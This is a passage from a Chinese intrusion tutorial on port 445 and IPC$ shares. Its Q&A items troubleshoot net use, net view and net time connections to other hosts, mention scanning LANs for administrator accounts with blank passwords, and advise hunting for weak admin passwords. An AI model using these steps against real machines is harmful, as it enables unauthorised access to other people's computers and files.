　　11. 我建立了一個連接 f:>net use *.*.*.*ipc$ "123" /user:"guest" 成功了，但當我映射時出現(xiàn)了錯誤，向我要密碼，怎么回事?

　　F:>net use h: *.*.*.*c$

　　密碼在 *.*.*.*c$ 無效。

　　請鍵入 *.*.*.*c$ 的密碼 :

　　系統(tǒng)發(fā)生 5 錯誤。

　　拒絕訪問。

　　答：呵呵，向你要密碼說明你當前使用的用戶權限不夠，不能映射 C$ 這個默認共享，想辦法提升權限或者找管理員的弱口令吧!默認共享一般是需要管理員權限的。

　　12. 我用 superscan 掃到了一個開了 139 端口的主機，但為什么不能空連接呢?

　　答：你混淆了 ipc$ 與 139 的關系，能進行 ipc$ 連接的主機一定開了 139 或 445 端口，但開這兩個端口的主機可不一定能空連接，因為對方可以關閉 ipc$ 共享 .

　　13. 我們局域網(wǎng)里的機器大多都是 xp ，我用流光掃描到幾個 administrator 帳號口令是空，而且可以連接，但不能復制東西，說錯誤 5 。請問為什么?

　　答： xp 的安全性要高一些，在安全策略的默認設置中，對本地帳戶的網(wǎng)絡登錄進行身份驗證的時候，默認為來賓權限，即使你用管理員遠程登錄，也只具有來賓權限，因此你復制文件，當然是錯誤 5 ：權限不夠。

　　14. 我用 net use 192.168.0.2ipc$ "password" /user:"administrator" 成功，可是 net use i: 192.168.0.2c

　　出現(xiàn)請鍵入 192.168.0.2 的密碼，怎么回事情呢?我用的可是管理員呀?應該什么都可以訪問呀?

　　答：雖然你具有管理員權限，但管理員在設置 c 盤共享權限時(注意：普通共享可以設置訪問權限，而默認共享則不能)可能并未設置允許 administrator 訪問，所以會出現(xiàn)上述問題。

　　15. 如果自己的機器禁止了 ipc$, 是不是還可以用 ipc$ 連接別的機器?如果禁止 server 服務呢?

　　答：禁止以上兩項仍可以發(fā)起 ipc$ 連接，不過這種問題自己動手試驗會更好。

　　16. 能告訴我下面的兩個錯誤產(chǎn)生的原因嗎?

　　c:>net time 61.225.*.*

　　系統(tǒng)發(fā)生 5 錯誤。

　　拒絕訪問。

　　c:>net view 61.225.*.*

　　系統(tǒng)發(fā)生 5 錯誤。

　　拒絕訪問。

　　答：起初遇到這個問題的時候我也很納悶，錯誤 5表示權限不夠，可是連空會話的權限都可以完成上面的兩個命令，他為什么不行呢?難道是他沒建立連接?后來那個粗心的同志告訴我的確是這樣，他忘記了自己已經(jīng)刪了 ipc$ 連接，之后他又輸入了上面那兩個命令，隨之發(fā)生了錯誤 5 。

　　17. 您看看這是怎么回事?

　　F:>net time

　　找不到時間服務器。

　　請鍵入 NET HELPMSG 3912 以獲得更多的幫助。

　　答：答案很簡單，你的命令錯了，應該是 net time ip

　　沒輸入 ip 地址，當然找不到服務器。 view 的命令也應該有 ip 地址，即： net view ip

【445端口入侵詳解】相關文章：

怎么關閉445端口10-19

電腦445端口怎么關閉09-02

教你如何打開445端口09-01

怎么手動關閉445端口08-25

關閉系統(tǒng)445端口的方法12-13

Win10系統(tǒng)如何關閉445端口11-28

Win10關閉445端口的方法11-23

如何防止電腦被入侵10-28

如何防御病毒入侵電腦08-20

如何避免系統(tǒng)病毒入侵09-19